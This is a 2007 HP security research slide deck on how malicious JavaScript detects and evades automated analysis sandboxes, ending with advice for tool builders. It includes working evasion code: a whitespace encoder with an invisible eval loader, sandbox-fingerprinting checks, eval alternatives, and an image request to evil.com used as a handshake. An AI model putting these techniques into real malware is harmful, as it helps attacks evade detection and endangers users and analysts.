Circumventing Automated JavaScript Analysis Billy Hoffman (billy.hoffman@hp.com) HP Web Security Research Group © 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Circumventing
Automated
JavaScript
Analysis
Billy Hoffman
(billy.hoffman@hp.com)
HP Web Security Research Group
© 2007 Hewlett-Packard Development Company, L.P.
The information contained herein is subject to change without notice
Overview
•
JavaScript is part of the attacker’s toolkit
− All the “vanilla” stuff over
− Packing traditional malware
•
IBM ISS: “In second half 2007 Web attack
obfuscation approached 100%”*
•
Exploit frameworks amplify the problem
− Rapid adoption of new techniques
•
We need tools to analyze this
•
How are we doing and can we win?
* From: IBM Internet Security Systems X-Force® 2008 Mid-Year Trend Statistics
Obfuscation Design Pattern
•
Malicious code is stored
− String literals
− Numeric literals
•
Decode function unpacks literals
into new code
•
Ratio of literals to total code is
huge!
− Normal code: 2%-7%
− Obfuscated code: > 30%
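The literal-to-code ratio above can be estimated with a rough scan. The following is a minimal sketch, assuming a regex is good enough to find string and numeric literals (it is not a real tokenizer and will miscount regex literals and comments). The name literalRatio and both sample inputs are hypothetical.

```javascript
// Heuristic only: a regex scan, not a real JavaScript tokenizer.
function literalRatio(source) {
  if (source.length === 0) return 0;
  // Double-quoted strings, single-quoted strings, hex numbers, decimal numbers.
  var literal = /"(?:[^"\\\n]|\\.)*"|'(?:[^'\\\n]|\\.)*'|\b(?:0[xX][0-9a-fA-F]+|\d+(?:\.\d+)?)\b/g;
  var matches = source.match(literal) || [];
  var literalChars = 0;
  for (var i = 0; i < matches.length; i++) {
    literalChars += matches[i].length;
  }
  // Fraction of all characters that sit inside a literal.
  return literalChars / source.length;
}

// Hypothetical samples: ordinary code versus a packed payload.
var plainSample = 'function add(a, b) { var total = a + b; return total; }';
var packedSample = 'eval(unescape("%61%6c%65%72%74%28%31%29"));';

var plainRatio = literalRatio(plainSample);
var packedRatio = literalRatio(packedSample);
```

A scanner could flag anything above the 30% mark from the slide for closer inspection, bearing in mind that legitimate packers also push the ratio up.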
Obfuscation Example
Obfuscation != Malicious
•
Legitimate reasons for obfuscating
− “Protect” client-side code
− Reducing download size
•
Common packers
− JSMin
− Dean Edwards packer
− Yahoo’s
•
Result: It’s tough to know what to analyze
Original Approach to JS Analysis
•
The Lazy Method
− Replace dangerous calls with alert()
− Run in a browser
•
The Tom Liston Method
− Wrap writes in <TEXTAREA>s
− Run in a browser
•
The Perl-Fu Method
− Port the malware to Perl
•
The Monkey Wrench Method
− Run it in SpiderMonkey
Tricks to Defeating Analysis
•
Deliberate sandbox breaks
− </TEXTAREA>
•
Integrity Checks
− arguments.callee.toString()
• arguments.callee.toString().replace(/\W/g,"").toUpperCase();
− Gives source code of function body
• Length checks
• Use function body as key
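Why editing the code breaks such a check can be shown with a small sketch. It assumes the check normalizes the function source the way the slide does, and it passes the function in explicitly instead of using arguments.callee so that it also runs in strict mode. The names sourceFingerprint, original, and tampered are hypothetical; neither sample function is ever called.

```javascript
// Normalize a function's source the same way the slide does:
// drop every non-word character and upper-case the rest.
function sourceFingerprint(fn) {
  return fn.toString().replace(/\W/g, "").toUpperCase();
}

// The code as the author shipped it (never invoked here).
var original = function () { document.write("payload"); };

// The same code after an analyst swapped the dangerous call for alert().
var tampered = function () { alert("payload"); };

var originalPrint = sourceFingerprint(original);
var tamperedPrint = sourceFingerprint(tampered);

// A length check alone already notices the edit.
var lengthMatches = originalPrint.length === tamperedPrint.length;
```

If the fingerprint is used as key material for the next decoding layer, the tampered copy derives the wrong key and decodes garbage.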
VBScript Wrapper
•
Still in use!
− Older DHTML web apps
− Plug-in enumeration (IE8)
− Malware
•
No open source VBScript parsers
•
No public standard grammar
•
Not very wide-spread
[Diagram: JavaScript, VBScript, JavaScript layers]
Preventing Sample Collection
•
Can’t reverse what you don’t have!
•
Track IPs
− Geolocation
− Blacklist security firms
•
Serve once per IP
•
User-agent sniffing
•
document.referrer tricks
For those playing at home
Approach                      Difficulties
All Approaches                Sampling prevention
The Lazy Method               Integrity checks; running hostile code in browser
The Tom Liston Method         Integrity checks; </TEXTAREA> escapes; running hostile code in browser
Perl Fu                       Way too time consuming; translating JavaScript constructs
The Monkey Wrench Approach    Does pretty well
Approach Today
•
Combination of automatic and manual
•
Interpreters and debuggers (aka sandboxes)
− Rhino
− NJS
− DecryptJS
− SpiderMonkey
•
Trap/monitor certain events
− DOM calls
− eval()s, etc
It’s More Complex Than That
•
JS interpreter/debugger
less than ½ the battle
•
JavaScript != DOM
− Host objects
− Events/Timers
− HTTP requests
− Error handling
•
DOM >= HTML
− HTTP headers/cookies
− Browser environment
− Plug-ins
Fundamental Issue
Current JavaScript sandboxes fail to
fully/properly emulate browser
environment. These discrepancies are
detectable by the JavaScript running
inside the sandbox.
Detecting JavaScript Sandboxes
•
4 big areas
− DOM Testing
− Network Testing
− Execution Environment Testing
− Plug-in Testing
•
Use test results
− Decrypt next layer
− Handshake to serve next layer
DOM Testing
•
Using the DOM values
•
Detecting presence/lack of
•
Get and sets on values
•
Interacting with HTML elements
DOM Testing: Basic
•
Sandbox Specific Functions
− gc()
− clone()
− trap()
− untrap()
− readline()
•
Malware forces SpiderMonkey to die
− try {quit();} catch (e) { }; //more code here
Detecting Sandbox Specific Functions
if(typeof(gc)=="function") {… } else {…}
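A sandbox author can run the same test against their own environment to see what it leaks. Below is a minimal sketch, assuming the global object is passed in as a parameter so the check can be exercised against stand-in objects. The function name findShellFunctions and both fake environments are hypothetical; the list of names comes from the slide.

```javascript
// Names from the slide: functions a JavaScript shell exposes but a browser does not.
var SHELL_ONLY = ["gc", "clone", "trap", "untrap", "readline"];

// `scope` stands in for the global object (an assumption made for testability).
function findShellFunctions(scope) {
  var found = [];
  for (var i = 0; i < SHELL_ONLY.length; i++) {
    if (typeof scope[SHELL_ONLY[i]] === "function") {
      found.push(SHELL_ONLY[i]);
    }
  }
  return found;
}

// Hypothetical stand-ins for a browser global and a shell global.
var fakeBrowser = { alert: function () {} };
var fakeShell = { gc: function () {}, readline: function () {}, print: function () {} };

var browserLeaks = findShellFunctions(fakeBrowser);
var shellLeaks = findShellFunctions(fakeShell);
```

Any non-empty result is a discrepancy that hostile script could test for in the same way.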
Function Clobbering
•
JavaScript is highly dynamic
• Can redefine functions at runtime!
Redefining print() as quit()
Redefining quit() To Nothing
Intertwined DOM Properties
•
Various aliases in the DOM
− document.location == window.location ==
document.URL
− window == window.window == window.self ==
window.parent
• == window.self.self.self.self...
− Any global variable attaches to window
• var spi = 5; window.spi == spi; //true
•
Set a value on one alias
•
Read on another alias
•
Different values mean a sandbox
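The set-on-one-alias, read-on-another test can be sketched against stand-in objects. This is a minimal illustration, assuming only the window, window.window, and window.self aliases. The function aliasesAgree and both factory functions are hypothetical.

```javascript
// Set a value through one alias, read it back through the others.
function aliasesAgree(win) {
  var probe = "aliasProbe";
  win.self[probe] = "set-on-self";
  var agree = win.window[probe] === "set-on-self" &&
              win[probe] === "set-on-self";
  delete win.self[probe];
  return agree;
}

// Stand-in for a real browser: every alias is the same object.
function makeFaithfulWindow() {
  var w = {};
  w.window = w;
  w.self = w;
  return w;
}

// Stand-in for a sloppy emulation: `self` is a separate dummy object.
function makeSloppyWindow() {
  var w = {};
  w.window = w;
  w.self = {};
  return w;
}

var faithfulResult = aliasesAgree(makeFaithfulWindow());
var sloppyResult = aliasesAgree(makeSloppyWindow());
```

The same pattern extends to the location aliases listed above, which is why an emulated DOM needs shared state and not independent dummy properties.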
document.retarded
•
Mosaic Netscape 0.9beta (1994)
•
Set using HTTP headers
− Set-Cookie:
− Cookie:
•
Get/Set using JavaScript
− document.cookie
•
Set using HTML
− <META> tag
Meta Tag
•
Supply meta data about HTML document
•
http-equiv attribute
− Allows document to specify HTTP headers
− Content overriding an application protocol
HTTP-EQUIV to the rescue
•
Setting cookies with HTML
<html>
<meta HTTP-EQUIV="Set-Cookie"
CONTENT="cook2=Value 2">
<meta HTTP-EQUIV="Set-Cookie"
CONTENT="cook1=Value 1">
<script>
alert(document.cookie);
</script>
Setting Cookies with HTML
Hello Proprietary Extension!
•
Setting cookies with HTML
<html>
<meta HTTP-EQUIV="Set-Cookie"
CONTENT="cook2=Value 2; HttpOnly">
<meta HTTP-EQUIV="Set-Cookie"
CONTENT="cook1=Value 1">
<script>
alert(document.cookie);
</script>
Setting Cookies with HTML
More Meta Tag Fun
•
Hide Script in non-scriptable attribute
<html>
<title>Safe</title>
<meta http-equiv="refresh"
content="0;url=javascript:alert('EVIL')">
<h1>All safe. Trust me!</h1>
</html>
HTTP Refresh Header
•
Completely remove JS from response body!
HTTP/1.1 200 OK
Refresh: 0;url=javascript:alert('EVIL!')
Connection: close
Content-Length: 29
<h1>I'm Clean... really.</h1>
Psst!
(IE8 supports the data: URI...
data:text/html and
data:text/javascript are
awesome!)
Network Testing
•
Sandboxes use dummy network objects
− Good “Are you a browser?” test
•
Use information about response
− DNS successful?
− Last Modified?
− Image Dimensions?
− Valid Response?
•
Forces the sandbox to send network traffic
− Web bugs for hackers?
Network Testing – DNS Lookups
<script>
var count =0;
function loaded(name) {if(name!="bad")count++;}
window.onload = function evil() {
if(count == 1) alert("Browser!");
else alert("Sandbox!");
}
</script>
<iframe src="http://doesnotexist1"
onload="loaded(this.name);" name="bad"></iframe>
<iframe src="http://doesnotexist2"
onload="loaded(this.name);" name="bad"></iframe>
<iframe src="http://exists/foo.html"
onload="loaded(this.name);" name="good"></iframe>
Network Testing – DNS Lookups
Network Testing - Images
•
Image object provides rich meta data
− Height
− Width
− Image was valid?
•
CSS Images too
•
Use this information
− Complex handshaking
− Construct a Key
var img = new Image();
img.onload = goodFunc;
img.onerror = badFunc;
img.src="http://evil.com/";
Side Note: Image Side Channels
•
JavaScript Image object
•
Height + width = 8 bytes
•
How to send 0xFFFFFFFF without 4GB of pixel
data?
− GIF, PNG, Windows too short
− BMP + RLE? Nope
•
XBM Image Format
#define w 1351
#define h 1689
static char b[]={0};
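Generating such a header takes a few lines. The sketch below only builds and re-parses the text of the file; whether a given browser accepts the image and reports these dimensions is not verified here. The function names makeXbm and readXbmDimensions are hypothetical.

```javascript
// Build an XBM file whose declared dimensions carry two numbers,
// with a single byte of pixel data as on the slide.
function makeXbm(width, height) {
  return "#define w " + width + "\n" +
         "#define h " + height + "\n" +
         "static char b[]={0};\n";
}

// Recover the two numbers from the text, as a receiver would from
// the Image object's width and height.
function readXbmDimensions(xbm) {
  var w = /#define w (\d+)/.exec(xbm);
  var h = /#define h (\d+)/.exec(xbm);
  if (!w || !h) return null;
  return { width: parseInt(w[1], 10), height: parseInt(h[1], 10) };
}

var sampleXbm = makeXbm(1351, 1689);
var decoded = readXbmDimensions(sampleXbm);
```

Because the format is plain text, the file size grows with the digits of the numbers, not with the pixel area they claim.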
FF XBM WTF??!!!1111oneoneoneomg
The Dan Kaminsky Option
Network Testing - Ajax
•
Ajax can see HTTP response headers
− Complex handshaking
− Construct a key
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
  // readyState 4 means the response is complete
  if (xhr.readyState == 4 && xhr.status == 200) {
    if (xhr.getResponseHeader("Secr3t") == "key") {
      //do evil
    }
  }
};
Execution Environment Testing
•
Sandboxes execute code differently
− Trap function calls
− Step/break on code
− Manipulate data
•
Can detect these differences
− Timing information
− Event Order
− Error Handling
Timing Information
•
Use JavaScript’s Date object
− Millisecond resolution times
•
Can detect paused execution
<script>
var start = (new Date()).getTime();
document.writeln(String.fromCharCode(66,77,72));
</script>
<script>
var diff= (new Date()).getTime() - start;
if(diff < 3) document.writeln("Browser");
else document.writeln("Sandbox");
</script>
Detecting Steps/Breaks with Timers
•
Timers are a pain!
− Can’t really wait 5 seconds
− Ordering
− Clearing
•
Can detect paused execution
•
Start a Timer
− Perform some math operation (Count++)
•
After fixed interval
− Sample the value
Detecting Steps/Breaks with Timers
var count = 0;
setInterval("count++;", 10);
setTimeout(checkSum, 1000);
function checkSum() {
  // A 10 ms interval fires at most about 100 times in 1000 ms; allow for skew
  if (count >= 95 && count <= 100) {
    alert("Browser");
  } else {
    alert("Sandbox");
  }
}
Event Order
Sandboxes don’t run events in the proper order
• XMLHttpRequest’s onreadystatechange() fires 4 times
•
onclick() >> onclick() >> ondblclick()
• onkeydown() >> onkeypress() >> onkeyup()
•
onmousedown() >> onmouseup() >> onclick()
• onmouseover() >> onmousemove()
• onfocus() >> onclick() (for inputs)
•
onfocus() >> onblur()
• onload() >> onunload()
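An emulator's event log can be checked against one of these sequences with a simple subsequence test. The sketch below assumes handlers have already pushed event names into an array in firing order. The function name firesInOrder and the two sample logs are hypothetical.

```javascript
// True when every name in `expected` appears in `log` in the same
// relative order (other events may be interleaved).
function firesInOrder(log, expected) {
  var position = 0;
  for (var i = 0; i < log.length && position < expected.length; i++) {
    if (log[i] === expected[position]) {
      position++;
    }
  }
  return position === expected.length;
}

var expectedClick = ["mousedown", "mouseup", "click"];

// What a real click is expected to record.
var browserLog = ["mouseover", "mousedown", "mouseup", "click"];

// What a naive emulator might record if it fires click first.
var emulatorLog = ["click", "mousedown", "mouseup"];

var browserOk = firesInOrder(browserLog, expectedClick);
var emulatorOk = firesInOrder(emulatorLog, expectedClick);
```

The boolean result can gate the next stage just like the timing checks, so an emulator has to reproduce ordering and not only the presence of each event.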
Advanced Event Order
•
Dependents’ onload fires before
window.onload
− iFrames
− Images
•
Event propagation
− DOM events must bubble
− Continue based on return value of
event
•
Events that never fire
− Invisible with CSS
[Diagram: nesting WINDOW > BODY > DIV > DIV > INPUT with onclick handlers at several levels]
Error Handling
•
window.onerror handles uncaught exceptions
•
Induce syntax errors
•
Recover in handler
<script>
window.onerror = function() {
//evil code
}
</script>
<script>
Lolz &nd B00m$; //Syntax Error
</script>
Error Handling
•
window.onerror handles uncaught exceptions
•
Induce runtime errors
•
Harder to handle/debug
window.onerror = function() {
//evil code
}
function boom() {
return 'so long!' & boom();
}
boom(); // error too much recursion
Advanced Error Handling
•
Detailed info passed to
window.onerror
− Message
− File
− Line Number
•
Can be used to
− Fingerprint web browser
− Verify domain/location
− Construct a decryption key
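How the three values passed to window.onerror could feed a key is sketched below. The hash and the XOR step are toy stand-ins chosen for brevity, not a scheme taken from any observed sample, and the URL is made up. The function names keyFromError and xorWithKey are hypothetical.

```javascript
// Fold the message, file, and line number into a one-byte key.
function keyFromError(message, file, line) {
  var material = message + "|" + file + "|" + line;
  var key = 0;
  for (var i = 0; i < material.length; i++) {
    key = (key * 31 + material.charCodeAt(i)) & 0xFF;
  }
  return key;
}

// XOR every character with the key; applying it twice restores the input.
function xorWithKey(text, key) {
  var out = [];
  for (var i = 0; i < text.length; i++) {
    out.push(String.fromCharCode(text.charCodeAt(i) ^ key));
  }
  return out.join("");
}

// Hypothetical values an onerror handler might receive.
var keyAtLine1 = keyFromError("x is not defined", "http://example.test/a.js", 1);
var keyAtLine2 = keyFromError("x is not defined", "http://example.test/a.js", 2);

var hidden = xorWithKey("next layer", keyAtLine1);
var recovered = xorWithKey(hidden, keyAtLine1);
```

Moving the script to another URL, or adding a line above the error, changes the derived key, which is what ties the payload to its original location.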
Plug-in Testing
•
Not just navigator.plugins checks
•
Timing is a cool test
− Did I really invoke that ActiveX object?
•
Sizing is a cool test
− Is that Applet really 400 x 300?
•
Cross Communication
− Really sexy!
− Apply previous methods inside plug-in
• Error handling, Eventing, etc
JavaScript -> Flash -> JavaScript
•
Multiple ways
− getURL();
− Flash LSO
•
Additional capabilities
− Richer HTTP requests
− More File formats
•
Excellent browser support
JavaScript -> Java -> JavaScript
•
Lots of fun object casting
− JSObject -> double -> JSObject
•
Java has more capabilities than JS
− High resolution timers
− Sockets
− Internal IP
•
Assault the researcher!
− Signed Applets can access the file system!
•
LiveConnect
− var myAddress = java.net.InetAddress.getLocalHost();
Preventing Sample Gathering
•
Browser Identification for Web Applications
(Shreeraj Shah 2004)
•
HTTP headers
− Ordering and Values
− Redirects, form posts, content types, cookie settings
•
HTTP Caching
− Obeying the directives
• HTTP/1.1 HTTP/1.0 Precedence
− Sending conditional GETs
Crazy Idea #1
•
Obfuscated Code is
obviously interesting
− But not always malicious
•
“Safe” looking code might not
be interesting
•
Can I create code that
doesn’t look malicious?
Dehydrating a String
•
Converts any string into whitespace
•
7 bits per character
− 1 = space
− 0 = tab
•
\n means we are done
•
‘a’ = 1100001
•
Dehydrate('a') = space, space, tab, tab, tab,
tab, space
Dehydrate Function
function dehydrate(s) {
  var r = new Array();
  for(var i=0; i < s.length; i++) {
    // emit the low 7 bits, most significant first
    for(var j=6; j >=0; j--) {
      if(s.charCodeAt(i) & (Math.pow(2,j))) {
        r.push(' ');   // 1 = space
      } else {
        r.push('\t');  // 0 = tab
      }
    }
  }
  r.push('\n');        // terminator
  return r.join('');
}
Hydrate Function
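function hydrate(s) {
  var r = new Array();
  var curr = 0;
  // stop at the terminator, or at end of input if it is missing
  while(curr < s.length && s.charAt(curr) != '\n') {
    var tmp = 0;
    // rebuild one character from 7 whitespace "bits"
    for(var i=6; i>=0; i--) {
      if(s.charAt(curr) == ' ') {
        tmp = tmp | (Math.pow(2,i));
      }
      curr++;
    }
    r.push(String.fromCharCode(tmp));
  }
  return r.join('');
}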
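A round trip through the two functions confirms the encoding. The block below is a compact restatement using bit shifts in place of Math.pow, written as a self-contained sketch. The variable names encodedA and roundTrip are hypothetical.

```javascript
// 7 bits per character, most significant bit first: 1 = space, 0 = tab.
function dehydrate(s) {
  var r = [];
  for (var i = 0; i < s.length; i++) {
    for (var j = 6; j >= 0; j--) {
      r.push((s.charCodeAt(i) & (1 << j)) ? " " : "\t");
    }
  }
  r.push("\n"); // terminator
  return r.join("");
}

// Inverse: read 7 whitespace characters at a time until the newline.
function hydrate(s) {
  var r = [];
  var curr = 0;
  while (curr < s.length && s.charAt(curr) !== "\n") {
    var tmp = 0;
    for (var i = 6; i >= 0; i--) {
      if (s.charAt(curr) === " ") {
        tmp |= (1 << i);
      }
      curr++;
    }
    r.push(String.fromCharCode(tmp));
  }
  return r.join("");
}

// 'a' is 1100001: space, space, tab, tab, tab, tab, space, then newline.
var encodedA = dehydrate("a");
var roundTrip = hydrate(dehydrate("alert(1)"));
```

Only 7-bit characters survive the trip; anything with a code above 127 loses its high bits.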
Invisible Malicious Code!
//st4rt
//3nd
var html = document.body.innerHTML;
var start = html.indexOf("//st" + "4rt");
var end = html.indexOf("3" + "nd");
var code = html.substring(start+12, end);
eval(hydrate(code));
Crazy Idea #2
•
Who cares how it’s encoded?
•
Eventually they have to
execute the string of code
•
CaffeineMonkey et al are just
hooking eval()
•
Can I execute malicious code
stored in a string without
eval()?
Eval() The Interpreter has a Posse…
var evilCode = "alert('evil');";
window.location.replace("javascript:" + evilCode);
document.location.replace("javascript:" + evilCode);
setTimeout(evilCode, 10);
setInterval(evilCode, 500);
new Function(evilCode)();
//IE only
window.execScript(evilCode);
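For tool developers, this means wrapping more than eval(). A minimal sketch of a generic wrapper follows, assuming the executors are reachable as properties of a global-like object. A plain object stands in for window here, and the name hookStringExecutors is hypothetical.

```javascript
// Wrap each named function on `scope` so that string arguments are
// logged before the original function runs.
function hookStringExecutors(scope, names, log) {
  for (var i = 0; i < names.length; i++) {
    (function (name) {
      var original = scope[name];
      if (typeof original !== "function") return; // not present in this host
      scope[name] = function (code) {
        if (typeof code === "string") {
          log.push(name + ": " + code);
        }
        return original.apply(this, arguments);
      };
    })(names[i]);
  }
}

// Stand-in for a browser window with two of the executors present.
var captured = [];
var fakeWindow = {
  setTimeout: function (code, delay) { return 1; },
  execScript: function (code) {}
};

hookStringExecutors(fakeWindow, ["setTimeout", "setInterval", "execScript"], captured);
fakeWindow.setTimeout("alert('evil');", 10);  // string form: logged
fakeWindow.setTimeout(function () {}, 10);    // function form: ignored
```

javascript: URLs passed to location.replace() and code passed to new Function() do not go through a plain property wrapper like this one, so they need separate handling inside the interpreter or the emulated DOM.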
Fixing All of This
•
Advice for tool developers
− Remove discrepancies between sandbox and browser
• DOM/HTTP/DNS/Network/Eventing
− Everything should be interesting
− The sandbox needs a sandbox; you will be attacked.
•
Advice for others
− Microsoft
• Publish a Grammar for VBScript
• Disable completely based on DOCTYPE
− Adobe: Release a controllable Flash VM
Shoulders of Giants
•
Jose Nazario
•
Ben Feinstein
•
Internet Storm Center guys
•
Stephan Chenette, et al. @ WebSense
•
Shreeraj Shah
•
Rob Freeman
•
Aviv Raff
Questions?
billy.hoffman@hp.com